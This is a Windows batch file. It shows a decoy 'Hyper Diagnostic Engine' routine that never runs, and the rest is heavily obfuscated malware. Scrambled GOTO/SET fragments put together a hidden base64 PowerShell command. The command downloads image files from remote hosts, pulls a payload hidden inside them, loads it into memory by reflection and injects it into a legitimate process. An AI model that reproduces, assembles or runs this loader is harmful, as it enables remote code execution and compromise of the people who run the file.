@echo off

:: ======================================
:: SIMULATED SYSTEM ROUTINE - SAFE BLOCK
:: ======================================

goto :skipDummy

:dummyRoutine
title Hyper Diagnostic Engine X
color 0B
echo Booting Hyper Diagnostic Engine...
timeout /t 1 >nul
echo Preparing components...
timeout /t 1 >nul

setlocal EnableDelayedExpansion
set "idx=1"

:processLoop
if !idx! GTR 10 goto finish
set /a value=!random! %% 200
echo [Unit !idx!] generated output: !value!
set /a idx+=1
timeout /t 1 >nul
goto processLoop

:finish
echo.
echo Running deep scan phase...
for /L %%x in (1,1,5) do (
    set /a calc=!random! %% 75 + 5
    echo Step %%x completed with result !calc!
    timeout /t 1 >nul
)

echo.
echo Diagnostics complete. Status: OK
pause
:endDummyRoutine

:skipDummy
:: ======================================
:: END OF SIMULATED BLOCK
:: ======================================

GOTO NOFJIIDODD
:DFDHNNJGNG
SET KKDODGGFOG=AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgAA0ACgAgACAAIAA
GOTO DNIINOKJKS
:JGOJNSDJGG
SET KDIGOUJIDN=AIAAgACAAIAAgACAAIAAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8AD
GOTO KGOOGKNUGO
:DNIINOKJKS
SET UIGGOIJIGK=gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADYANABMAGUAbgB
GOTO OGJOGDNGSI5
:NKSOISOGJO
SET JSDHFJUGID=AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlA
GOTO DDGNGGSJGF
:NDDODFNIDF
SET IDINIGNIHF=BhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4A
GOTO DDNOINFFGS1
:GSOOFDOFGG
SET DGDJIGFINU=gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAQgB5AHQAZQB
GOTO IKIIGDDNGS
:FFGSNOIDSF
SET NDGNFNHOFG=GcAdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO USDGNNJOSH
:JIDIGOOIJO
SET HFGDSNNOGG=HQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAA0ACgAg
GOTO NJDOGSOGJF
:KGOOGKNUGO
SET JJFJNJIJGG=wAUwBUAEEAUgBUAD4APgAnADsAIAAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwARQBOAEQAP
GOTO DDNOINFFGS5
:GDGOGONGGD
SET JIDNDUIJSO=ACwAIAAnAHgAOAA2ACcAKQApAH0AfQA='';$oWfdfjfdsuxd = [system.Text.enco
GOTO GGDFFDIFOH6
:OGJOGDNGSI
SET GINJFIDUND=ACAAIAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0A
GOTO JDJOJJFUID
:DGDSSGNGGI
SET NNOUOJFDNF=JABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGc
GOTO JDJOJJFUID9
:FJSJIIFNJS
SET OGNKNNSGHK=AbABkACcAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO IFGIFGDGIG
:FDGKGSHNNS
SET JOGOHINFOG=AAgACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0ACcAOwANAAoAIAA
GOTO GSOOFDOFGG
:OGJOGDNGSI7
SET DNNFDNFIOI=ACAAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAd
GOTO OGJOGDNGSI8
:DNNKDKDGDD
SET JFONONFFJG=HcAbgBsAG8AYQBkAHMALwAyAC4AagBwAGcAJwApACwAKAAkAGwAZgBzAGQAZgBzAGQAZwAg
GOTO FGGSDFDOKD
:JNKGOHNGSG
SET FDUSFFGGON=EAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwANAAoAIAAgA
GOTO JOODDIFFJJ
:NJDOGSOGJF
SET NNIKGFHDIG=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATAB
GOTO GSIUIOOFDD
:OGJOGDNGSI5
SET UNDFHGNUGJ=nAHQAaABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAc
GOTO OGJOGDNGSI6
:OGDONDFOKN
SET GSJOISGSGD=F0AXQAgACgAJABnAGcAIAAsACcAMAAnACwAIAAnACcALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAg
GOTO GDGOGONGGD
:DDGNGDOFDF
SET DNDDKODNNN=AAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAcgB1AG4AcwAnAC
GOTO GGDFFDIFOH3
:IKIIGDDNGS
SET NOIDIIDJFH=zADIAIAA9ACAAJwBwAHMAOgAvAC8AJwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO KDFIOUFGJH7
:NOFJIIDODD
SET IIGFNIODDO=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command 
GOTO NOFINJOOOF
:GGIGNNFDOG
SET GODIGDGIKS=QBtAGEAZwBlAEIAeQB0AGUAcwApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO JGOJNSDJGG
:OGJOGDNGSI0
SET IGDJNJKDJI=gAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4
GOTO OGJOGDNGSI1
:FGOGHIGGDN
SET UFGNFFGNGG=YgB1AGMAawBlAHQALgBvAHIAZwAvAGcAaABf#AGoAawBnAGgAbABf#AGcAbAAvAGcAaABmAC8AZABvA
GOTO DNNKDKDGDD
:UNUDGFGIJU
SET GDGFNIJGSJ=AHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYA
GOTO JDJOJJFUID5
:SOJUOFDGDS
SET FGFNKIDNNJ=IABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAcwAgACQAbABpAG4AawBzA
GOTO GDFGOHNGGJ
:DDNOINFFGS
SET NDGFGFJISJ=AZQBjAG8AbgBkAHMAIAAzAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO OGJOGDNGSI
:OGJOGDNGSI2
SET FNDIGGUJNS=JAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAf#AD0
GOTO DFDHNNJGNG
:FGGSDFDOKD
SET SFGHGSGGFU=ACsAIAAnAHAAYQBzAHQAZQAuAHMAZQBuAHMAaQBvAC4AbgBvAC8AUwBpAGMAawBuAGUA
GOTO GNFOSIDJDF3
:DFFGFGNSDF
SET DUGFGIFJFD=G4AZwAoADAALAAgACQAZwBnAC4ATABlAG4AZwB0AGgAIAAtACAANQApAA0ACgAgACAAIAAgAA0ACgA
GOTO GGDFFDIFOH1
:GFNINGOFII
SET NGUKNFIFIK=dAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAEwAZQBuA
GOTO FFGSNOIDSF
:JOODDIFFJJ
SET DNHOJSIGGS=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABjAG8AbQBtAG
GOTO UIFNOHDDOS
:GGDFFDIFOH
SET FOOKJIDIFK=gACAAIAAgACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAGEAZABEA
GOTO FIFGHIGDSG
:UIFNOHDDOS
SET DFNOIFDIII=EAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBG
GOTO UNUDGFGIJU
:NKSOISOGJO7
SET IDODJDUIID=IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAdAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQB
GOTO NKSOISOGJO8
:UKIOGOJOOF
SET NGOGOOGDIG=gBqAGUAYwB0ACAAQwBQAFUAIAAtAEQAZQBzAGMAZQBuAGQAaQBuAGcAIAB8ACAAUwBlAGwAZQ
GOTO JDGGNIGNKH
:JDJOJJFUID
SET IIINGIHOJI=YQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4
GOTO NKSOISOGJO
:NKSOISOGJO2
SET IHFINOGDII=AYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAg
GOTO NKSOISOGJO3
:JIGIGDSDDH
SET DJSDOSNGHN=JABsAGkAbgBf#ACkAIAB9ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQA
GOTO KDFIOUFGJH2
:NSGONOFDGG
SET JOGIGIOGDD=gACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQ
GOTO NDDODFNIDF
:DIFIIGDNFN
%IIGFNIODDO%%GGNJHOIGJO%%DGKGGFJFDF%%GFNODNGGOG%%NDGFGFJISJ%%GINJFIDUND%%IIINGIHOJI%%JSDHFJUGID%%JDFDONIJDD%%FOOKJIDIFK%%FGGDJNNOND%%UDOJNFNGDS%%FUONGIHOGH%%HFGDSNNOGG%%NNIKGFHDIG%%INNUONDONU%%NGUKNFIFIK%%NDGNFNHOFG%%OOKIJUSSNH%%GISGOFOGGI%%JOGOSGGGGG%%DJSDOSNGHN%%DGUFIUDNJJ%%ODJOJJGGNU%%JOGOHINFOG%%DGDJIGFINU%%NOIDIIDJFH%%GSDIUKSUDS%%DGGFGGIGFD%%GIFGIDSNGN%%UFGNFFGNGG%%JFONONFFJG%%SFGHGSGGFU%%KFDOIFGNFD%%GGUGGFNDDK%%IIFSDGIIDS%%NIGISDGDDD%%FGFNKIDNNJ%%DGJJOUJIUN%%JOGIGIOGDD%%IDINIGNIHF%%FOUOIGDODJ%%GODIGDGIKS%%KDIGOUJIDN%%JJFJNJIJGG%%IDJJGNONON%%GIDDNUDSJO%%GHUSOGOONS%%DHJFONDGJO%%GNGONFGODU%%IGDJNJKDJI%%DNJUGSGJIG%%FNDIGGUJNS%%KKDODGGFOG%%UIGGOIJIGK%%UNDFHGNUGJ%%JSIGFDJODF%%DNNFDNFIOI%%NJIIGFIGDN%%SGNDFNJUOI%%GNJGJDIHON%%FDUSFFGGON%%DNHOJSIGGS%%DFNOIFDIII%%GDGFNIJGSJ%%DDDNIDIGJO%%OKJIGGFGID%%DDDGGGDIHG%%NNOUOJFDNF%%SJSUSONJJD%%DFFKGNFFHO%%HGIDFFSSOH%%IHFINOGDII%%HGIDGFNSNN%%FFODGUJGII%%GDHFGDGGGD%%DOGIGJJIGF%%IDODJDUIID%%GGIFNFFNJF%%NFJFGDFNSK%%GFIUNGIDHD%%NGOGOOGDIG%%FHDFGSSSDG%%ODJJIFJGNG%%NIODONDOIG%%OGNKNNSGHK%%JIJFOGGGOF%%GJGDDDOGJS%%NODJIGSIGD%%FNFIIIDDIN%%DUGFGIFJFD%%OHOHGOSDGN%%DNDDKODNNN%%IDIDGNIDGG%%GSJOISGSGD%%JIDNDUIJSO%%DDJNIUJNUJ%%IJIOJDFNIO%%OFIDJDOOOI%
GOTO FIFGHIGDSG1
:DDNOINFFGS8
SET DHJFONDGJO=gBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAG
GOTO DDNOINFFGS9
:GGDFFDIFOH8
         
GOTO GGDFFDIFOH9
:JDJOJJFUID5
SET DDDNIDIGJO=NABDAG8AbQBtAGEAbgBkACkAOwAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0
GOTO JDJOJJFUID6
:FONIIDJJGG
SET FUONGIHOGH=gACAAIAAgACAAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjA
GOTO JIDIGOOIJO
:NKSOISOGJO5
SET GDHFGDGGGD=UwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAANQAgAHwAIA
GOTO NKSOISOGJO6
:OFJNDGDDGN
SET IIFSDGIIDS=8AbgBDAGEAbABsAGUAcgBzACcAKQApADsAIAAgACAAIAAgACAAIAAgAA0ACg
GOTO GNFOSIDJDF6
:DGNJFDFGGN
SET GIFGIDSNGN=gACQAbABpAG4AawBzACAAPQAgAEAAKAAoACQAbABmAHMAZABmAHMAZABnACAAKwAgACcAYgBpAHQA
GOTO FGOGHIGGDN
:GSIUIOOFDD
SET INNUONDONU=pAG4AawBzACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMA
GOTO GFNINGOFII
:GGDFFDIFOH6
SET DDJNIUJNUJ=ding]::Unicode.GetString([system.convert]::Frombase64string([r
GOTO GGDFFDIFOH7
:OGJOGDNGSI1
SET DNJUGSGJIG=AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdAB
GOTO OGJOGDNGSI2
:GDFGOHNGGJ
SET DGJJOUJIUN=DsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgA
GOTO NSGONOFDGG
:JFDSIUNOJG
SET NODJIGSIGD=8AYwAuAHQAbgBlAHQAbgBvAGMAcgBlAHMAdQBiAHUAaAB0AGkAZwAuAHcAYQByAC8ALwA6AH
GOTO JJOKUGIFGG
:GNFOSIDJDF
SET GFNODNGGOG=AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFM
GOTO DDNOINFFGS
:JDJOJJFUID0
SET GNJGJDIHON=IAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAG
GOTO JNKGOHNGSG
:JJOKUGIFGG
SET FNFIIIDDIN=MAZwBzAGYAZgBzACcAIAA7ACAAJABnAGcAIAA9ACAAJABnAGcALgBTAHUAYgBzAHQAcgBpA
GOTO DFFGFGNSDF
:GNFOSIDJDF4
SET GGUGGFNDDK=AAJwBwAGEAcwB0AGUALgBzAGUAbgBzAGkAbwAuAG4AbwAvAEMAaQB0AGEAdABpAG
GOTO OFJNDGDDGN
:GGDFFDIFOH3
SET IDIDGNIDGG=AAKwAgACcAcwAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbA
GOTO OGDONDFOKN
:OGJOGDNGSI6
SET JSIGFDJODF=gB0AEkAbgBkAGUAeAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO OGJOGDNGSI7
:NKSOISOGJO0
SET DFFKGNFFHO=QBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQ
GOTO NKSOISOGJO1
:FIFGHIGDSG
SET FGGDJNNOND=GEAdABhAEYAcgBvAG0ATABpAG4AawBzACAAewAgAHAAYQByAGEAbQAgACgAWwBzAHQAcgBpAG4A
GOTO INIDFGUDSU
:GGDFFDIFOH9
SET OFIDJDOOOI=             
GOTO DIFIIGDNFN
:JDJOJJFUID6
SET OKJIGGFGID=AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBu
GOTO JDJOJJFUID7
:GNFOSIDJDF3
SET KFDOIFGNFD=cwBzAFMAYQBuAGQAeQAnACkAIAAsACgAJABsAGYAcwBkAGYAcwBkAGcAIAAf#AC
GOTO GNFOSIDJDF4
:KIUOFGHOGN
SET GFIUNGIDHD=AAgACAAIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBvAHIAdAAtAE8AY
GOTO UKIOGOJOOF
:IFGIFGDGIG
SET JIJFOGGGOF=gACAAIAAgACQAZwBnACAAPQAgACcAcgBlAG4AZQB0AHMAbwBzAC8AbgBpAGEAbQAvAHMAZABh
GOTO DDGNGGSJGF7
:JDJOJJFUID7
SET DDDGGGDIHG=AGQARgBsAGEAZwApADsAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAA
GOTO DGDSSGNGGI
:ODGHSFNGHJ
SET ODJOJJGGNU=AgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsACAAfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO FDGKGSHNNS
:NKSOISOGJO6
SET DOGIGJJIGF=BGAG8AcgBtAGEAdAAtAFQAYQBiAGwAZQAgAE4AYQBtAGUALABDAFAAVQANAAoAIAAgACAAIAAgACAA
GOTO NKSOISOGJO7
:DDNOINFFGS9
SET GNGONFGODU=QARgBsAGEAZwApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO OGJOGDNGSI0
:KDFIOUFGJH
SET DGKGGFJFDF=ndowStyle Hidden -ArgumentList '-Command \"$ddsdfgo = ''DQAKACAAIAAgACAAIAAgACA
GOTO GNFOSIDJDF
:GFGJNIGDGD
SET NIODONDOIG=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAGoAZQBjAD0AJwBNAHMAYgB1AGk
GOTO FJSJIIFNJS
:JDGGNIGNKH
SET FHDFGSSSDG=BjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAANQAgAHwAIABGAG8AcgBtAGEAdA
GOTO DDGNGGSJGF3
:INIDFGUDSU
SET UDOJNFNGDS=ZwBbAF0AXQAkAGwAaQBuAGsAcwApACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO FONIIDJJGG
:NKSOISOGJO1
SET HGIDFFSSOH=BjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQ
GOTO NKSOISOGJO2
:GGDFFDIFOH7
SET IJIOJDFNIO=egex]::Replace($ddsdfgo, ''f#'', ''r'')));iex $oWfdfjfdsuxd\"'"
GOTO GGDFFDIFOH8
:DDNOINFFGS1
SET FOUOIGDODJ=RQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAa
GOTO GGIGNNFDOG
:NKSOISOGJO9
SET NFJFGDFNSK=BvAG0AZQBlAHMAJwApADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI
GOTO KIUOFGHOGN
:DDNOINFFGS7
SET GHUSOGOONS=QAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAb
GOTO DDNOINFFGS8
:GGDFFDIFOH1
SET OHOHGOSDGN=gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABtAGUAdABoAG8AZ
GOTO DDGNGDOFDF
:NKSOISOGJO8
SET GGIFNFFNJF=kAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAG0AeQBwAHIAbwBnAHIAYQBtAC4ASA
GOTO NKSOISOGJO9
:SHNDDODGDN
SET GISGOFOGGI=mAGwAZQBkAEwAaQBuAGsAcwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB
GOTO KDFIOUFGJH0
:DDGNGGSJGF
SET JDFDONIJDD=F0AOgA6AFQAbABzADEAMgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO GGDFFDIFOH
:KDFIOUFGJH2
SET DGUFIUDNJJ=gAH0AIAB9ADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO ODGHSFNGHJ
:KDFIOUFGJH8
SET DGGFGGIGFD=B5AHQAZQBzADIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO DGNJFDFGGN
:NKSOISOGJO3
SET HGIDGFNSNN=ACAAIAAgACAAIAAgACAAIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBvAHIAdAAtAE8AYgB
GOTO NKSOISOGJO4
:DDNOINFFGS5
SET IDJJGNONON=gA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeA
GOTO DDNOINFFGS6
:DDNOINFFGS6
SET GIDDNUDSJO=B0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAD
GOTO DDNOINFFGS7
:KDFIOUFGJH0
SET JOGOSGGGGG=3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgA
GOTO JIGIGDSDDH
:GNFOSIDJDF6
SET NIGISDGDDD=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0A
GOTO SOJUOFDGDS
:KDFIOUFGJH7
SET GSDIUKSUDS=AAgACAAIAAgACQAbABmAHMAZABmAHMAZABnACAAPQAgACAAJABCAHkAdABlAHMAIAAf#ACQAQg
GOTO KDFIOUFGJH8
:USDGNNJOSH
SET OOKIJUSSNH=CAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHUAZgB
GOTO SHNDDODGDN
:OGJOGDNGSI8
SET NJIIGFIGDN=AAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwA
GOTO OGJOGDNGSI9
:OGJOGDNGSI9
SET SGNDFNJUOI=IAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoAGgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAA
GOTO JDJOJJFUID0
:JDJOJJFUID9
SET SJSUSONJJD=AKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABsAG8AY
GOTO NKSOISOGJO0
:NKSOISOGJO4
SET FFODGUJGII=qAGUAYwB0ACAAQwBQAFUAIAAtAEQAZQBzAGMAZQBuAGQAaQBuAGcAIAB8ACAA
GOTO NKSOISOGJO5
:NOFINJOOOF
SET GGNJHOIGJO="Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Wi
GOTO KDFIOUFGJH
:DDGNGGSJGF3
SET ODJJIFJGNG=AtAFQAYQBiAGwAZQAgAE4AYQBtAGUALABDAFAAVQANAAoAIAAgACAAIAAgACAAI
GOTO GFGJNIGDGD
:DDGNGGSJGF7
SET GJGDDDOGJS=AGUAaAAvAHMAZgBlAHIALwBzAGwAbwBoAC8AbwBkAGEAdQByAGcAZQBzAGEALwBtAG
GOTO JFDSIUNOJG
:FIFGHIGDSG1